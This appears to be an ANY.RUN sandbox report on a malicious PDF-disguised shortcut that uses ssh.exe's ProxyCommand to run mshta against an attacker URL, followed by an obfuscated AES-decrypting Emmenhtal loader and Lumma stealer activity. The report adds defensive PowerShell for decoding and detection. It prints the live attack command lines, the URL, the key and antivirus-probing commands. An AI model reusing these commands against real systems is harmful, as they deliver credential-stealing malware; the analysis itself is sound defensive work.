File name:

Instruction_695-18014-012_Rev.pdf.lnk

Full analysis: https://app.any.run/tasks/3c43dfe0-1419-4cf0-a4cd-01437d930cf8
Verdict: Malicious activity
Threats:

First identified in 2024, Emmenhtal is a loader that hides its script stage inside modified copies of legitimate Windows binaries and relies on mshta.exe to run that stage as an HTA (HTML Application). In this sample the HTA is the hekko.mp4 file that mshta.exe fetches: mshta executes whatever it retrieves regardless of the file extension, so the media-looking name only serves to get past filters and casual inspection. Emmenhtal has been linked to the distribution of malware such as CryptBot and Lumma Stealer and is typically spread through phishing campaigns, including fake video downloads and deceptive email attachments.

Analysis date: December 31, 2024, 10:43:19
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
emmenhtal
loader
lumma
stealer
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x018b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

C5997A14E872D97D48E1D4EA8B66910F

SHA1:

E5BC26705B9DF5EADFC65FF0BB600743B4D2894D

SHA256:

1E31450855498AA18F97E2BD1B77AA3CF652B88271502CA7EE926938C04B722F

SSDEEP:

24:8N8PZsx/Tfff//YK/Urrt1v+/+GaWbUkT+1Z8lOxk86+vddS9dbEQWhWUIeFIU:87TXvYKKLGaaUkIigdo9aQv5W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2380)
      • powershell.exe (PID: 4640)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 2380)
      • powershell.exe (PID: 4640)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4640)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 2380)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 4640)
    • LUMMA mutex has been found

      • powershell.exe (PID: 4840)
    • Actions looks like stealing of personal data

      • powershell.exe (PID: 4840)
    • Steals credentials from Web Browsers

      • powershell.exe (PID: 4840)
    • Executing a file with an untrusted certificate

      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 6996)
      • ManyCam.exe (PID: 7076)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 7044)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 3208)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 4640)
    • LUMMA has been detected (YARA)

      • powershell.exe (PID: 4840)
    • Antivirus name has been found in the command line (generic signature)

      • tasklist.exe (PID: 6484)
      • cmd.exe (PID: 1356)
      • find.exe (PID: 1556)
      • cmd.exe (PID: 7156)
      • tasklist.exe (PID: 6768)
      • find.exe (PID: 6716)
      • tasklist.exe (PID: 3780)
      • cmd.exe (PID: 5788)
      • find.exe (PID: 2788)
      • cmd.exe (PID: 6804)
      • tasklist.exe (PID: 6660)
      • find.exe (PID: 6652)
      • cmd.exe (PID: 5968)
      • tasklist.exe (PID: 5404)
      • find.exe (PID: 5572)
    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 6056)
    • EMMENHTAL loader has been detected

      • powershell.exe (PID: 2380)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 2380)
  • SUSPICIOUS

    • Application launched itself

      • powershell.exe (PID: 6704)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6704)
      • ssh.exe (PID: 6608)
      • mshta.exe (PID: 6056)
      • powershell.exe (PID: 2380)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 2380)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 2380)
    • Executes script without checking the security policy

      • powershell.exe (PID: 2380)
      • powershell.exe (PID: 4640)
    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 6056)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 2380)
      • mshta.exe (PID: 6056)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4840)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 6996)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 7044)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 3208)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
    • Starts itself from another location

      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 6996)
    • Process drops legitimate windows executable

      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)
    • Detected use of alternative data streams (AltDS)

      • pcaui.exe (PID: 7120)
    • Reads the Windows owner or organization settings

      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
    • Reads security settings of Internet Explorer

      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
    • Get information on the list of running processes

      • cmd.exe (PID: 7156)
      • cmd.exe (PID: 6912)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
      • cmd.exe (PID: 1356)
      • cmd.exe (PID: 5788)
      • cmd.exe (PID: 6804)
      • cmd.exe (PID: 5968)
    • Starts CMD.EXE for commands execution

      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
    • Uses TIMEOUT.EXE to delay execution

      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
  • INFO

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 2380)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 2380)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 6056)
    • Checks proxy server information

      • mshta.exe (PID: 6056)
      • powershell.exe (PID: 4640)
    • The process uses the downloaded file

      • mshta.exe (PID: 6056)
      • powershell.exe (PID: 2380)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 2380)
    • Disables trace logs

      • powershell.exe (PID: 4640)
    • Manual execution by a user

      • powershell.exe (PID: 4840)
    • Checks supported languages

      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 6996)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)
      • ManyCam.exe (PID: 7076)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 7044)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 3208)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
      • EdgeColorLib.exe (PID: 4984)
    • The sample compiled with english language support

      • powershell.exe (PID: 4840)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 6996)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)
    • Create files in a temporary directory

      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 6996)
      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 7044)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe (PID: 3208)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
      • EdgeColorLib.exe (PID: 4984)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4640)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4640)
      • powershell.exe (PID: 2380)
    • Reads the computer name

      • S5XF7PFF0L5EBLJADOTQX9.exe (PID: 7104)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • ManyCam.exe (PID: 7076)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
      • EdgeColorLib.exe (PID: 4984)
    • Reads CPU info

      • ManyCam.exe (PID: 7076)
    • Process checks computer location settings

      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 7100)
      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 2380)
    • Creates files or folders in the user directory

      • 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp (PID: 5208)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 11
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: ssh.exe
Description: Adobe PDF Document
RelativePath: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
CommandLineArguments: -o ProxyCommand="powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)" .
IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
No data.
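The shortcut never launches PowerShell directly. Its target is the built-in OpenSSH client, reached through a relative path of seven "..\" hops that lands on the drive root from wherever the .lnk is opened, and the real command rides in ssh's -o ProxyCommand option, which ssh runs before any connection is attempted. That command is itself a junk-wrapped string: PowerShell's .SubString(18, 54) drops the 18-character prefix and the matching suffix and leaves "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4", so a rule that looks for "mshta" or the URL at the start of the argument string misses it unless the wrapper is unwrapped first. The "Adobe PDF Document" description and the msedge.exe icon are the lure. The PowerShell below is an added example, not part of the ANY.RUN report; it recovers the hidden command statically from the argument string shown in the LNK metadata, without executing anything. The function names and the sample path in the closing comment are my own.

```powershell
# Added example (not from the ANY.RUN report): statically unwrap the command hidden in the
# LNK's ssh.exe ProxyCommand argument and flag the pattern, without executing anything.

# TargetFileDOSName and CommandLineArguments copied verbatim from the report's LNK metadata.
$lnkTarget = 'ssh.exe'
$lnkArgs   = '-o ProxyCommand="powershell powershell -Command ''UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy''.SubString(18, 54)" .'

function Resolve-SubStringTrick {
    <# Finds every  '<wrapped>'.SubString(<start>, <length>)  in a command line and returns
       the string PowerShell would produce at runtime, i.e. the payload with its junk
       prefix and suffix removed. #>
    param([Parameter(Mandatory)][string]$CommandLine)
    $pattern = "'(?<s>[^']*)'\.SubString\((?<start>\d+)\s*,\s*(?<len>\d+)\)"
    foreach ($m in [regex]::Matches($CommandLine, $pattern, 'IgnoreCase')) {
        $s     = $m.Groups['s'].Value
        $start = [int]$m.Groups['start'].Value
        $len   = [int]$m.Groups['len'].Value
        if ($start + $len -gt $s.Length) { continue }   # would throw at runtime; not a valid wrapper
        [pscustomobject]@{
            Recovered  = $s.Substring($start, $len)
            JunkPrefix = $s.Substring(0, $start)
            JunkSuffix = $s.Substring($start + $len)
        }
    }
}

function Test-LnkProxyExec {
    <# Verdict for a shortcut whose target is a binary that can run a command through one of
       its options (ssh.exe -o ProxyCommand here) and whose argument hides a further command. #>
    param([string]$Target, [string]$Arguments)
    $hidden = @(Resolve-SubStringTrick -CommandLine $Arguments)
    $proxy  = $Arguments -match '(?i)-o\s+ProxyCommand='
    $lolbin = $Target -match '(?i)^ssh\.exe$'
    [pscustomobject]@{
        Target           = $Target
        ProxyCommand     = $proxy
        HiddenCommands   = $hidden.Recovered
        StagesScriptHost = ($hidden.Recovered -join ' ') -match '(?i)\bmshta\b'
        Suspicious       = $lolbin -and $proxy -and $hidden.Count -gt 0
    }
}

Test-LnkProxyExec -Target $lnkTarget -Arguments $lnkArgs | Format-List

# On an analysis host the same fields come straight out of a .lnk through the WScript.Shell
# COM object (the sample path is hypothetical):
#   $sc = (New-Object -ComObject WScript.Shell).CreateShortcut('C:\samples\Instruction_695-18014-012_Rev.pdf.lnk')
#   Test-LnkProxyExec -Target (Split-Path $sc.TargetPath -Leaf) -Arguments $sc.Arguments
```

The regex deliberately mirrors only the shape PowerShell will evaluate (a single-quoted literal followed by .SubString with two integers); variants that build the string with concatenation or -replace need their own unwrapping step, which is why the verdict also keys on the ssh.exe plus ProxyCommand combination rather than on the recovered text alone.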
All screenshots are available in the full report
Total processes: 170
Monitored processes: 45
Malicious processes: 12
Suspicious processes: 7

Behavior graph

Process chain in the order the graph lists it (labels and #tags as shown in the graph):
  • ssh.exe (no specs)
  • conhost.exe (no specs)
  • powershell.exe (no specs)
  • powershell.exe (no specs)
  • mshta.exe
  • #EMMENHTAL powershell.exe (no specs)
  • conhost.exe (no specs)
  • powershell.exe
  • conhost.exe (no specs)
  • #LUMMA powershell.exe
  • s5xf7pff0l5ebljadotqx9.exe
  • s5xf7pff0l5ebljadotqx9.exe
  • manycam.exe (no specs)
  • pcaui.exe (no specs)
  • 6j8w5nmxy4osav2vaeqfq8v5dng.exe
  • 6j8w5nmxy4osav2vaeqfq8v5dng.tmp
  • 6j8w5nmxy4osav2vaeqfq8v5dng.exe
  • 6j8w5nmxy4osav2vaeqfq8v5dng.tmp
  • timeout.exe (no specs)
  • conhost.exe (no specs)
  • cmd.exe (no specs), conhost.exe (no specs), tasklist.exe (no specs), find.exe (no specs), this group six times in a row
  • edgecolorlib.exe (no specs)

Process information

Columns: PID, CMD, Path, Indicators, Parent process
PID: 372
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1356
CMD: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Path: C:\Windows\System32\cmd.exe
Parent process: 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
PID: 1556
CMD: find /I "avastui.exe"
Path: C:\Windows\System32\find.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
PID: 2380
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function TrjYX($flSrW){return -split ($flSrW -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$YADH = Trj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isCf=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((TrjYX('437556726455514B504167474D78786B')),[byte[]]::new(16)).TransformFinalBlock($YADH,0,$YADH.Length)); & $isCf.Substring(0,3) $isCf.Substring(129)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
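The PID 2380 command line above is the Emmenhtal stage that mshta.exe launched, and its three steps are worth reading separately. A helper (TrjYX) turns a hex string into bytes: the -replace argument is mangled on this page, and the form this loader family normally uses is '0x$& ' (prefix every two hex digits with 0x, then let the unary -split break the result on the spaces so PowerShell casts each "0x.." token to a byte). The ciphertext is then AES-decrypted through [Security.Cryptography.Aes]::Create(), whose .NET defaults are CBC with PKCS7 padding, using the 16-byte key 43 75 56 72 64 55 51 4B 50 41 67 47 4D 78 78 6B (ASCII "CuVrdUQKPAgGMxxk") and an all-zero IV from [byte[]]::new(16). Finally the plaintext is dispatched with the call operator: the first three characters are the verb, everything from offset 129 onward is handed to it as a single argument, and the 126 characters in between are never used. The ciphertext itself is elided on this page. The PowerShell below is an added example rather than the loader's code or the report's: it reproduces the decode path with the report's key, encrypts a constructed plaintext of its own in the same layout so that the path can be exercised end to end, and returns the verb and argument instead of invoking them.

```powershell
# Added example (not the loader's code, not from the ANY.RUN report): emulate Emmenhtal's
# hex -> AES-CBC -> "& verb args" stage without executing the result.

function ConvertFrom-HexPairs {
    # The loader's idiom: prefix each hex pair with 0x, split on whitespace, and let PowerShell
    # cast "0x43" -> 67. The -ne '' guard drops any empty element a trailing space could leave.
    param([Parameter(Mandatory)][string]$Hex)
    if ($Hex.Length % 2) { throw "odd-length hex string" }
    [byte[]]@((-split ($Hex -replace '..', '0x$& ')) -ne '')
}

function Invoke-EmmenhtalStageDecode {
    # Mirrors: -join [char[]]((Aes::Create()).CreateDecryptor(key, 16 zero bytes)
    #                 .TransformFinalBlock(ct, 0, ct.Length)); & $s.Substring(0,3) $s.Substring(129)
    # but returns the pieces instead of invoking them.
    param([Parameter(Mandatory)][string]$CipherHex,
          [Parameter(Mandatory)][string]$KeyHex)
    [byte[]]$ct  = ConvertFrom-HexPairs $CipherHex
    [byte[]]$key = ConvertFrom-HexPairs $KeyHex
    $aes = [Security.Cryptography.Aes]::Create()          # .NET defaults: CBC, PKCS7
    $dec = $aes.CreateDecryptor($key, [byte[]]::new(16))  # all-zero IV, as in the sample
    $txt = -join [char[]]($dec.TransformFinalBlock($ct, 0, $ct.Length))
    if ($txt.Length -lt 130) { throw "decrypted text too short for the Substring(129) layout" }
    [pscustomobject]@{
        Verb      = $txt.Substring(0, 3)   # what '&' would invoke (a three-letter program name)
        Arguments = $txt.Substring(129)    # the single argument handed to it
        KeyAscii  = [Text.Encoding]::ASCII.GetString($key)
    }
}

# Key hex copied from the report's PID 2380 command line.
$keyHex = '437556726455514B504167474D78786B'

# The real ciphertext is elided on the page, so this is a constructed stand-in: a benign
# plaintext in the same layout (3-char verb, 126 filler chars, argument from offset 129),
# encrypted with the same key and zero IV so that the decode path above runs end to end.
$plain  = 'cmd' + ('X' * 126) + '/c echo emmenhtal-stage-emulation'
$pbytes = [Text.Encoding]::ASCII.GetBytes($plain)
$enc    = [Security.Cryptography.Aes]::Create().CreateEncryptor(
              (ConvertFrom-HexPairs $keyHex), [byte[]]::new(16))
$cipherHex = -join ($enc.TransformFinalBlock($pbytes, 0, $pbytes.Length) |
                    ForEach-Object { $_.ToString('X2') })

Invoke-EmmenhtalStageDecode -CipherHex $cipherHex -KeyHex $keyHex | Format-List
```

Two practical consequences follow from the construction. With a fixed key and an all-zero IV the scheme is deterministic, so two payloads that share the same leading bytes produce the same first ciphertext block, which makes the hex blob itself a usable indicator across samples that reuse a key. And because the verb is taken from Substring(0,3), the dispatched program is necessarily a three-character name; when reversing a live sample, replace the `&` with the kind of return shown here before running anything.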
PID: 2788
CMD: find /I "avgui.exe"
Path: C:\Windows\System32\find.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
PID: 3208
CMD: "C:\Users\admin\AppData\Local\Temp\6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe" /VERYSILENT
Path: C:\Users\admin\AppData\Local\Temp\6J8W5NMXY4OSAV2VAEQFQ8V5DNG.exe
Parent process: 6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp
User:
admin
Company:
ColorStream
Integrity Level:
MEDIUM
Description:
ColorStream Enhancement Library
Exit code:
0
Version:
2.1.0.47
Modules
Images
c:\users\admin\appdata\local\temp\6j8w5nmxy4osav2vaeqfq8v5dng.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\comctl32.dll
c:\windows\syswow64\advapi32.dll
PID: 3560
CMD: find /I "opssvc.exe"
Path: C:\Windows\System32\find.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
PID: 3780
CMD: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Path: C:\Windows\System32\tasklist.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Lists the current running tasks
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 3884
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4052
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
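Every hop in the chain above up to the dropped installers is a signed Microsoft binary (ssh.exe, powershell.exe, mshta.exe, cmd.exe, tasklist.exe, find.exe), so hash- or signer-based blocking does nothing for the early stages. What is distinctive is the parent/child relationships and the command-line shapes: ssh.exe started with -o ProxyCommand, mshta.exe given a URL that ends in a media extension, PowerShell run with -w 1 -ep Unrestricted -nop and an inline CreateDecryptor call, and a burst of cmd.exe /C tasklist /FI "IMAGENAME eq <product>" | find /I "<product>" launched from a process in %TEMP% (the exit code 1 on each find.exe simply means that product was not running in the sandbox). The PowerShell below is an added example, not part of the report: it runs rules for those four shapes over constructed process-creation records laid out like Sysmon Event ID 1 fields (Image, ParentImage, CommandLine, ProcessId). The rule names and the records are mine, modelled on the PIDs in this report, and the parent of ssh.exe is an assumption since the report does not show it; the closing comment shows how the same function takes real events from Get-WinEvent.

```powershell
# Added example (not from the ANY.RUN report): behavioural rules for this chain, run over
# constructed process-creation records in the shape of Sysmon Event ID 1.

$events = @(
    # Constructed records modelled on the report's process tree (PIDs taken from the report;
    # ssh.exe's parent is assumed, the report does not show it).
    @{ ProcessId=6608; Image='C:\Windows\System32\OpenSSH\ssh.exe'; ParentImage='C:\Windows\explorer.exe'
       CommandLine='ssh.exe -o ProxyCommand="powershell powershell -Command ''UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy''.SubString(18, 54)" .' }
    @{ ProcessId=6056; Image='C:\Windows\System32\mshta.exe'; ParentImage='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine='mshta https://awakka-aws3.zoho-documents.com/hekko.mp4' }
    @{ ProcessId=2380; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage='C:\Windows\System32\mshta.exe'
       CommandLine='powershell.exe -w 1 -ep Unrestricted -nop $x=-join [char[]]([Security.Cryptography.Aes]::Create().CreateDecryptor($k,[byte[]]::new(16)).TransformFinalBlock($c,0,$c.Length)); & $x.Substring(0,3) $x.Substring(129)' }
    @{ ProcessId=1356; Image='C:\Windows\System32\cmd.exe'; ParentImage='C:\Users\admin\AppData\Local\Temp\6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp'
       CommandLine='"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"' }
    @{ ProcessId=5788; Image='C:\Windows\System32\cmd.exe'; ParentImage='C:\Users\admin\AppData\Local\Temp\6J8W5NMXY4OSAV2VAEQFQ8V5DNG.tmp'
       CommandLine='"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"' }
    @{ ProcessId=4242; Image='C:\Windows\System32\cmd.exe'; ParentImage='C:\Windows\explorer.exe'
       CommandLine='"cmd.exe" /C tasklist /FO CSV' }   # benign control record, should not fire
) | ForEach-Object { [pscustomobject]$_ }

$rules = @(
    @{ Name='ssh.exe launched with -o ProxyCommand (LNK-to-LOLBin launcher)'
       Test={ param($e) $e.Image -match '(?i)\\ssh\.exe$' -and $e.CommandLine -match '(?i)-o\s+ProxyCommand=' } }
    @{ Name='mshta.exe fetching a remote "media" file (HTA with spoofed extension)'
       Test={ param($e) $e.Image -match '(?i)\\mshta\.exe$' -and $e.CommandLine -match '(?i)https?://\S+\.(mp4|mp3|jpg|png|pdf)\b' } }
    @{ Name='PowerShell hidden/unrestricted with inline AES decrypt-and-dispatch'
       Test={ param($e) $e.Image -match '(?i)\\powershell\.exe$' -and
                        $e.CommandLine -match '(?i)-ep\s+(Unrestricted|Bypass)' -and
                        $e.CommandLine -match '(?i)CreateDecryptor|TransformFinalBlock' } }
    @{ Name='AV presence probe via tasklist|find from a %TEMP% parent'
       Test={ param($e) $e.Image -match '(?i)\\cmd\.exe$' -and
                        $e.ParentImage -match '(?i)\\AppData\\Local\\Temp\\' -and
                        $e.CommandLine -match '(?i)tasklist\s+/FI\s+"IMAGENAME eq [^"]+"\s.*\|\s*find\s+/I' } }
)

function Invoke-ProcessRules {
    param([Parameter(Mandatory)][object[]]$Events, [Parameter(Mandatory)][hashtable[]]$Rules)
    foreach ($e in $Events) {
        foreach ($r in $Rules) {
            if (& $r.Test $e) {
                [pscustomobject]@{
                    ProcessId = $e.ProcessId
                    Rule      = $r.Name
                    Image     = Split-Path $e.Image -Leaf
                    Parent    = Split-Path $e.ParentImage -Leaf
                }
            }
        }
    }
}

$hits = Invoke-ProcessRules -Events $events -Rules $rules
$hits | Format-Table -AutoSize

# The AV probe fires once per product checked; the count per parent is the real signal.
$hits | Where-Object Rule -like 'AV presence*' | Group-Object Parent | Select-Object Name, Count

# Real data: Sysmon Event ID 1 records carry the same field names, so they can be fed in
# directly (Get-WinEvent is the stock cmdlet; the XML-to-object flattening is the usual idiom).
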